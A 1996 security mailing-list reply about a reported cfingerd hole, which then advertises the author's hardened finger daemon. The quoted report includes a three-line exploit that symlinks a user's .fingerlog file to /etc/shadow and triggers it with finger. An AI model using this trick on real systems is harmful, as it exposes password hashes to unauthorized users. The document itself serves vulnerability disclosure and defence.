From leitner@leibniz.math.fu-berlin.de Mon Aug 26 04:41:38 1996 Received: from ki1.chemie.fu-berlin.de (ki1.Chemie.FU-Berlin.DE [160.45.24.21]) by suburbia.net (8.7.4/Proff-950810) with SMTP id EAA04880 for ; Mon, 26 Aug 1996 04:41:34 +1000 Received: by ki1.chemie.fu-berlin.de (Smail3.1.28.1) from leibniz.math.fu-berlin.de (160.45.40.10) with smtp id ; Sun, 25 Aug 96 20:40 MEST Received: by leibniz.math.fu-berlin.de (/\=-/\ Smail3.1.18.1 #18.14) id ; Sun, 25 Aug 96 20:40 MET DST Received: by maddison.math.fu-berlin.de (Smail3.1.29.1) id ; Sun, 25 Aug 96 20:40 MET DST Message-Id: Date: Sun, 25 Aug 1996 20:40:01 +0200 From: leitner@math.fu-berlin.de (Felix von Leitner) To: cmatei@lbi.sfos.ro (Matei Conovici ~SysAdm~) Cc: best-of-security@suburbia.net Subject: Re: BoS: cfingerd possible security hole In-Reply-To: <199608251101.NAA01337@lbi.sfos.ro>; from Matei Conovici ~SysAdm~ on Aug 25, 1996 13:01:16 +0200 References: <199608251101.NAA01337@lbi.sfos.ro> X-Mailer: Mutt 0.40 Mime-Version: 1.0 Thus spake Matei Conovici ~SysAdm~ (cmatei@lbi.sfos.ro): > Exploit: > say i'm user joe. > > $ cd ~joe > $ ln -s /etc/shadow .fingerlog > $ finger joe@localhost Let me take this opportunity to spread unsolicited advertisement for my finger daemon: ftp://ftp.prz.tu-berlin.de/pub/unix/security/ffingerd It comes with autoconf support, is supposed to run as nobody, does paranoid syslogging and does not allow @host queries and symlinks as .forward. It does not give away things like the users' shell and home directory. Felix